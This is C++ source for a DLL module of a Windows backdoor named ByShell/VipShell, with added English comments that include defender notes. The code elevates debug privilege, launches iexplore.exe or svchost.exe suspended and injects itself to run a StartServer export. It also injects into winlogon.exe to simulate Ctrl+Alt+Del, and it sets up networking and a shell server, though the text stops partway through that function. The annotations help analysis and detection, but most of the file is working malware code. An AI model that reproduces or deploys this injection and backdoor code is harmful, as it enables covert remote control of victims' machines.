#include <windows.h>
#include <time.h>
//#include "usrlib.h"
//#pragma comment(lib,"usrlib")
#include "tchar.h"
#include "VipShellEx.h"
#include "..\DllModule.h"
#include "tools.h"
// Shared data segment. The linker directive below marks .BYShell__Data as
// read/write/shared (RWS), so g_Path is a single instance shared by every
// process that maps this DLL rather than a per-process copy. Any host process
// can therefore overwrite the value that every other host later reads through
// GetExeFilePath(); no synchronization around it is visible in this file.
#pragma data_seg(".BYShell__Data")
WCHAR g_Path[MAX_PATH] = {0}; // executable path published to all hosts; read by GetExeFilePath()
#pragma data_seg()
#pragma comment(linker, "/SECTION:.BYShell__Data,RWS")
#include "..\vipshellinfo\ByShellConfigStruct.h"
//const LPCWSTR INJECTPROCESSNAME = L"svchost.exe";
//const LPCWSTR WAITPROCESSNAME = L"winlogon.exe"; //等待线程
/*
const LPCWSTR INJECTPROCESSNAME = L"notepad.exe";
const LPCWSTR WAITPROCESSNAME = L"tlntsvr.exe"; //等待线程
*/
// Legacy OpenFile()-style handles and result struct (HFILE/OFSTRUCT). Static
// storage, so zero-initialised. None of the three is referenced anywhere in
// the visible part of this file.
HFILE ExeLockHandle;
HFILE DllLockHandle;
OFSTRUCT ofstruct;
// Module handle of this DLL. Not assigned in the visible code; presumably set
// from DllMain elsewhere.
HINSTANCE g_hinstDLL;
//WCHAR VIPSHELL_EVENT_WAIT[100] = L"ByShell_Event_Wait";
//WCHAR VIPSHELL_EVENT_STATR_WAIT[100] = L"ByShell_Event_StartWait";
//WCHAR VIPSHELL_EVENT_STATR_STOP[100] = L"ByShell_Event_StopWait";
// Concrete implementation of CDllModuleControlInterface (declared in
// ..\DllModule.h). Each Start* override spawns a worker thread that launches a
// suspended host process and calls InjectHideMeRemote on it with the name of
// an export from this file; the two overrides differ only in which host binary
// is launched (iexplore.exe vs. svchost.exe).
class CDllModuleControl : public CDllModuleControlInterface
{
public:
// Worker entry point: StartByShellIEXPLORE. Always returns false (see definition).
virtual bool StartServerIEXPLORE();
// Worker entry point: StartByShellSVCHOST. Always returns false (see definition).
virtual bool StartServerSVCHOST();
};
// Single global control object; presumably picked up by the host framework
// through ..\DllModule.h (the consumer is not visible in this file).
CDllModuleControl g_hDllModule;
//void StopServer()
//{
// HANDLE hStop = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_STATR_STOP);
//
//}
//
//bool Start()
//{
//
// //启动进程。。。
//
//// VIPSHELLCONFIG vipCfg;
//// GetVipShellConfig(&vipCfg);
//
//
// return 0;
//}
//int WINAPI WinMain( HINSTANCE hInstance,
// HINSTANCE hPrevInstance,
// LPSTR lpCmdLine,
// int nCmdShow
//)
//{
// return Start();
//}
// Copies the shared g_Path into the caller's buffer.
// p must point to at least MAX_PATH WCHARs: lstrcpy is unbounded and g_Path
// is MAX_PATH wide, so a smaller destination overflows. The source lives in
// the RWS-shared section, so the value may have been written by another
// process that maps this DLL.
void GetExeFilePath(WCHAR* p)
{
lstrcpy(p, g_Path);
}
// Starts the iexplore.exe host path on a new thread (StartByShellIEXPLORE).
// Notes for readers:
//  - The thread HANDLE returned by CreateThread is never closed (leaked).
//  - The return value is always 0/false and does not reflect whether the
//    thread was created; the outcome is reported only through dbglog.
//  - The worker runs asynchronously, so failures inside it are invisible to
//    the caller.
bool CDllModuleControl::StartServerIEXPLORE()
{
if(CreateThread(NULL,0,StartByShellIEXPLORE,0,0,0))
{
dbglog("创建工作线程成功,选择注入进程:iexplore.exe"); // "worker thread created; injection target: iexplore.exe"
}else
{
dbglog("创建工作线程失败,选择注入进程:iexplore.exe"); // "worker thread creation failed; injection target: iexplore.exe"
}
//CreateThread(NULL,0,HideMyService,0,0,0);
// Start();
return 0;
}
// Starts the svchost.exe host path on a new thread (StartByShellSVCHOST).
// Same caveats as StartServerIEXPLORE: the thread handle is leaked, the
// return value is always 0/false regardless of CreateThread's result, and the
// worker's own outcome is only visible in the debug log.
bool CDllModuleControl::StartServerSVCHOST()
{
if(CreateThread(NULL,0,StartByShellSVCHOST,0,0,0))
{
dbglog("创建工作线程成功,选择注入进程:svchost.exe"); // "worker thread created; injection target: svchost.exe"
}else
{
dbglog("创建工作线程失败,选择注入进程:svchost.exe"); // "worker thread creation failed; injection target: svchost.exe"
}
//CreateThread(NULL,0,HideMyService,0,0,0);
// Start();
return 0;
}
//DWORD WINAPI HideMyService(LPVOID lpParameter)
//{
// HANDLE hProcessH;
//
// //CStartAggregate hStart;
// //lstrcpy(g_Path, hStart.m_strExePath.c_str());
// //VIPSHELLCONFIG confing;
// //GetVipShellConfig( &confing);
//
// enableDebugPriv();
// DWORD dwWaitIdH = GetProcessIdByName(L"services.exe");//ProceeName
//
// hProcessH = OpenProcess( PROCESS_CREATE_THREAD| //允许远程创建线程
// PROCESS_VM_OPERATION| //允许远程VM操作
// PROCESS_VM_WRITE, //允许远程VM写
// FALSE,
// dwWaitIdH);
//
// if(dwWaitIdH != 0)
// {
// InjectHideMeRemote(hProcessH, /*&confing,*/"HideService");
// }
//
// return 0;
//}
// Worker thread body started by CDllModuleControl::StartServerIEXPLORE.
// Flow as visible here:
//  1. enableDebugPriv() — presumably requests SeDebugPrivilege; the result is
//     only logged and execution continues either way.
//  2. Two default-constructed COpenDesktop RAII objects (no desktop name
//     given; the second object looks redundant).
//  3. GetMyConfig(FALSE) — loads configuration (defined in tools.h, not
//     visible here).
//  4. Builds "<system drive>:\Program Files\Internet Explorer\iexplore.exe" by
//     truncating the system directory to its first two characters; this
//     assumes Program Files is on the system drive and that the path fits in
//     MAX_PATH (lstrcat is unbounded).
//  5. CreateProcess with CREATE_SUSPENDED, then InjectHideMeRemote(hProcess,
//     "StartServer"). The string matches this DLL's exported StartServer(), so
//     the child is presumably made to load this module and call that export;
//     whether the child's main thread is ever resumed depends on
//     InjectHideMeRemote (not visible here).
// Defender notes: a suspended iexplore.exe spawned by a non-browser parent and
// then subjected to cross-process memory/thread operations is the behaviour to
// alert on. ProcessInfo.hProcess / hThread are never closed, lpParameter is
// unused, and the return value is always 0.
DWORD WINAPI StartByShellIEXPLORE(LPVOID lpParameter)
{
if(enableDebugPriv())
{
dbglog("提升进程权限成功"); // "privilege elevation succeeded"
}else
{
dbglog("提升进程权限失败"); // "privilege elevation failed"
}
// KeyDownCtrlAltDel();
COpenDesktop hDesktop;
COpenDesktop hDesktop1;
// thread injection..
// get the desktop process
// std::vector<tagVipShellProcess> VecTor;
// DWORD dwLen = GetProcessToVecTor(&VecTor);
// MessageBox(NULL, L"sss", L"sss", 0);
//CStartAggregate hStart;
//lstrcpy(g_Path, hStart.m_strExePath.c_str());
//VIPSHELLCONFIG confing;
//GetVipShellConfig( &confing);
//wsprintf(VIPSHELL_EVENT_WAIT, L"Wait_%s", confing.szCfgFile);
//wsprintf(VIPSHELL_EVENT_STATR_WAIT, L"Start_Wait_%s", confing.szCfgFile);
//wsprintf(VIPSHELL_EVENT_STATR_STOP, L"StopWait_%s", confing.szCfgFile);
// HANDLE hObject = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_WAIT);
// if(GetLastError() == ERROR_ALREADY_EXISTS)
// {
//// CloseHandle(hObject);
// // MessageBox(NULL, L"程序已经运行!", L"dsss", 0);
// dbglog("失败!程序已经运行");
// return FALSE;
// }
// CloseHandle(hObject);
// lstrcpy(confing.szCfgFile, L"sss111");
// lstrcpy(confing.szExplain, L"呵呵");
// lstrcpy(confing.szUrl, L"Url");
// MakeRun(hStart.m_strExePath.c_str(), NULL);
// ::StartServer(&confing);
// return false;
//// fetch config; unless the config is fetched first, vipcfgEx.sz***Name cannot be used afterwards;
// VIPSHELLCONFIG vipcfgEx;
// GetVipShellConfig( &vipcfgEx);
//// end of config fetch
GetMyConfig(FALSE);
// launch IE via CreateProcess
WCHAR szIePath[MAX_PATH];
GetSystemDirectory(szIePath,MAX_PATH);
// Keep only the drive specifier ("C:"); a narrow '\0' assigned to a WCHAR is 0, so it terminates correctly.
szIePath[2] = '\0';
lstrcat(szIePath,L"\\Program Files\\Internet Explorer\\iexplore.exe");
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
StartupInfo.cb = sizeof StartupInfo;
// Child starts suspended; nothing in this function resumes it.
if(CreateProcess(NULL,szIePath,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&StartupInfo,&ProcessInfo))
{
dbglog("创建IE进程成功"); // "IE process created"
// start IE
//drvldr_stop("NTboot32");// try to stop the previous driver
//drvldr_reg("NTboot32",3,"system32\\NTboot32.sys");// register the driver
//drvldr_load("NTboot32");// load the new driver
//DWORD dwWaitId = 0;
//while(dwWaitId == 0)
// dwWaitId = GetProcessIdByName(L"winlogon.exe");//WaitProceeName
//
//std::vector<tagVipShellProcess> VecTor;
//DWORD dwLen = GetProcessToVecTor(&VecTor);
//HWND hwndText = FindWindow(L"Notepad", NULL);
// if( !hwndText )
// return 0;
// DWORD dwProcessId;
//// GetWindowThreadProcessId(hwndText, &dwProcessId);
// dwProcessId = GetProcessIdByName(L"IEXPLORE.EXE");//InjectProceeName
// "StartServer" names the export defined further down in this file.
InjectHideMeRemote(ProcessInfo.hProcess,/*dwProcessId,*/ /*&confing,*/"StartServer");
//if(dwWaitId != 0)
//{
// VIPSHELLCONFIG run;
//
// lstrcpy(run.szUrl, hStart.m_strExePath.c_str());
// InjectHideMeRemote(ProcessInfo.hProcess,/*dwWaitId,*/ &run,"WaitServer");
//}
}//if CreateProcess
else
{
dbglog("创建IE进程失败"); // "IE process creation failed"
}
return 0;
}
// Worker thread body started by CDllModuleControl::StartServerSVCHOST.
// Mirrors StartByShellIEXPLORE except for the host: it launches
// "<system directory>\svchost.exe" suspended and calls
// InjectHideMeRemote(hProcess, "StartServer"), where the string matches this
// DLL's exported StartServer(). Whether the child is ever resumed depends on
// InjectHideMeRemote (not visible here).
// Defender notes: svchost.exe created by a parent other than services.exe,
// started suspended, and then touched cross-process is the behaviour to alert
// on. ProcessInfo.hProcess / hThread are never closed, lpParameter is unused,
// the path buffer is built with unbounded lstrcat, and the return value is
// always 0.
DWORD WINAPI StartByShellSVCHOST(LPVOID lpParameter)
{
if(enableDebugPriv())
{
dbglog("提升进程权限成功"); // "privilege elevation succeeded"
}else
{
dbglog("提升进程权限失败"); // "privilege elevation failed"
}
COpenDesktop hDesktop;
COpenDesktop hDesktop1;
//CStartAggregate hStart;
//lstrcpy(g_Path, hStart.m_strExePath.c_str());
//VIPSHELLCONFIG confing;
//GetVipShellConfig( &confing);
//wsprintf(VIPSHELL_EVENT_WAIT, L"Wait_%s", confing.szCfgFile);
//wsprintf(VIPSHELL_EVENT_STATR_WAIT, L"Start_Wait_%s", confing.szCfgFile);
//wsprintf(VIPSHELL_EVENT_STATR_STOP, L"StopWait_%s", confing.szCfgFile);
//HANDLE hObject = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_WAIT);
//if(GetLastError() == ERROR_ALREADY_EXISTS)
//{
//dbglog("失败!程序已经运行");
// return FALSE;
//}
//// fetch config; unless the config is fetched first, vipcfgEx.sz***Name cannot be used afterwards;
// VIPSHELLCONFIG vipcfgEx;
// GetVipShellConfig( &vipcfgEx);
//// end of config fetch
GetMyConfig(FALSE);
// launch svchost via CreateProcess
WCHAR szSvchostPath[MAX_PATH];
GetSystemDirectory(szSvchostPath,MAX_PATH);
lstrcat(szSvchostPath,L"\\svchost.exe");
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo;
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
StartupInfo.cb = sizeof StartupInfo;
// Child starts suspended; nothing in this function resumes it.
if(CreateProcess(NULL,szSvchostPath,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&StartupInfo,&ProcessInfo))
{
dbglog("创建svchost进程成功"); // "svchost process created"
// start svchost
//drvldr_stop("NTboot32");// try to stop the previous driver
//drvldr_reg("NTboot32",3,"system32\\NTboot32.sys");// register the driver
//drvldr_load("NTboot32");// load the new driver
//DWORD dwWaitId = 0;
//while(dwWaitId == 0)
// dwWaitId = GetProcessIdByName(L"winlogon.exe");//WaitProceeName
//
//std::vector<tagVipShellProcess> VecTor;
//DWORD dwLen = GetProcessToVecTor(&VecTor);
//HWND hwndText = FindWindow(L"Notepad", NULL);
// "StartServer" names the export defined further down in this file.
InjectHideMeRemote(ProcessInfo.hProcess,/*dwProcessId,*/ /*&confing,*/"StartServer");
}//if CreateProcess
else
{
dbglog("创建svchost进程失败"); // "svchost process creation failed"
}
return 0;
}
// Exported with C linkage. The name matches the string KeyDownCtrlAltDel()
// passes to InjectHideMeRemote, so this is presumably resolved by name and run
// inside the target (winlogon.exe) after injection.
// Opens the "Winlogon" desktop via COpenDesktop (RAII; the second object looks
// redundant) and broadcasts WM_HOTKEY carrying Ctrl+Alt+Del to every top-level
// window, i.e. it simulates the Secure Attention Sequence by message rather
// than by keyboard. PostMessage's result is ignored and the function always
// returns true.
extern "C" __declspec(dllexport) bool DownCtrlAltDel()
{
COpenDesktop hDesktop(L"Winlogon");
COpenDesktop hDesktop1(L"Winlogon");
PostMessage(HWND_BROADCAST, WM_HOTKEY, 0, MAKELONG(MOD_ALT | MOD_CONTROL, VK_DELETE));
return true;
}
// Locates winlogon.exe by name and calls InjectHideMeRemote on it with
// "DownCtrlAltDel" (the export defined above). Not reached from any live code
// in this file: the only call site, at the top of StartByShellIEXPLORE, is
// commented out.
// Ordering issue: OpenProcess runs before dwWaitId is checked, so when
// GetProcessIdByName returns 0 the open is still attempted with pid 0 and
// hProcess may be NULL; the pid check only guards the injection call.
// hProcess is never closed. Defender note: a handle to winlogon.exe opened
// with PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE is a
// high-signal event for process-access monitoring.
void KeyDownCtrlAltDel()
{
HANDLE hProcess;
enableDebugPriv();
DWORD dwWaitId = GetProcessIdByName(L"Winlogon.exe");//ProceeName
hProcess = OpenProcess( PROCESS_CREATE_THREAD| // allow remote thread creation
PROCESS_VM_OPERATION| // allow remote VM operations
PROCESS_VM_WRITE, // allow remote VM writes
FALSE,
dwWaitId);
if(dwWaitId != 0)
{
//VIPSHELLCONFIG run;
InjectHideMeRemote(hProcess, /*&run*/ "DownCtrlAltDel");
}
}
//extern "C" __declspec(dllexport) bool WaitServer()
//{
// COpenDesktop hDesktop;
// COpenDesktop hDesktop1;
//
//// LPVIPSHELLCONFIG hServerConfig = (LPVIPSHELLCONFIG)lp;
////
//// MakeRun(hServerConfig->szUrl, NULL);
//// return false;
////
//// HANDLE hObject = CreateMutex(NULL,FALSE, VIPSHELL_EVENT_STATR_WAIT);
//// if(GetLastError() == ERROR_ALREADY_EXISTS)
//// {
//// // CloseHandle(hObject);
//// return 0;
//// }
//// MakeRun(hServerConfig->szUrl, NULL);
//////
//// DWORD dwWait = 1000;
//// while(1)
//// {
////
//// HANDLE hStop = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_STATR_STOP);
//// if(GetLastError() == ERROR_ALREADY_EXISTS)
//// {
////// MessageBox(NULL, L"Exit", L"Exit", 0);
//// MakeRun(hServerConfig->szUrl, NULL, false);
//// CloseHandle(hStop);
//// }
//// CloseHandle(hStop);
//// Sleep(dwWait);
//// dwWait+=1000;
//// if(dwWait > 30 * 60 * 1000)
//// dwWait = 30 * 60 * 1000;
//// HANDLE hObject = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_WAIT);
//// if(GetLastError() == ERROR_ALREADY_EXISTS)
//// {
//// // CloseHandle(hObject);
//// continue;
//// // MessageBox(NULL, L"程序已经运行!", L"dsss", 0);
////// return FALSE;
//// }
////
//// CloseHandle(hObject);
////
////
//// PROCESS_INFORMATION ProcessInfo;
//// STARTUPINFO StartupInfo; //This is an [in] parameter
//// ZeroMemory(&StartupInfo, sizeof(StartupInfo));
//// StartupInfo.cb = sizeof StartupInfo ; //Only compulsory field
//// if(CreateProcess(hServerConfig->szUrl, NULL,
//// NULL,NULL,FALSE,0,NULL,
//// NULL,&StartupInfo,&ProcessInfo))
//// {
//// CloseHandle(ProcessInfo.hThread);
//// CloseHandle(ProcessInfo.hProcess);
//// }
////
//// //RunFile(hServerConfig->szUrl);
//////ShellExecute(NULL, L"open", hServerConfig->szUrl, NULL, NULL, SW_SHOW);
////
//// }
//
// return 0;
//}
extern "C" __declspec(dllexport) bool StartServer()
{
if(enableDebugPriv())
{
dbglog("提升进程权限成功");
}
else
{
dbglog("提升进程权限失败");
}
COpenDesktop hDesktop;
COpenDesktop hDesktop1;
GetMyConfig(TRUE);
//HANDLE hMutex = CreateMutex(NULL, FALSE, VIPSHELL_EVENT_WAIT);
//LPVIPSHELLCONFIG hServerConfig = (LPVIPSHELLCONFIG)lp;
// MessageBox(NULL, g_Path, g_Path, NULL);
WORD wVersionRequested;
WSADATA wsaData;
int err;
// MessageBox(NULL, hServerConfig->szExplain, hServerConfig->szCfgFile, 0);
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
/* Tell the user t6hat we could not find a usable */
/* WinSock DLL. */
return 0;
}
CVipShellEx hServer;
HKEY hkey;
DWORD type=REG_SZ;
DWORD dwbuflen=MAX_PATH;
TCHAR lpdata[MAX_PATH];
WCHAR KeyExplain[512]={0};
lstrcpy(KeyExplain,L"SYSTEM\\CurrentControlSet\\Services\\");
lstrcat(KeyExplain,Conf_ServiceName);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,KeyExplain,0,KEY_QUERY_VALUE,&hkey);
if( !RegQueryValueEx(hkey,L"Explain",NULL,NULL,(LPBYTE)lpdata,&dwbuflen) )
{
hServer.SetExplain(lpdata);
}else
{
hServer.SetExplain(Conf_Explain);
}
RegCloseKey(hkey);
//下载配置文件。。
// hServer.ConnectServer(_T("127.0.0.1"), 96);
// hServer.ConnectServer(L"http://127.0.0.1/ip.txt");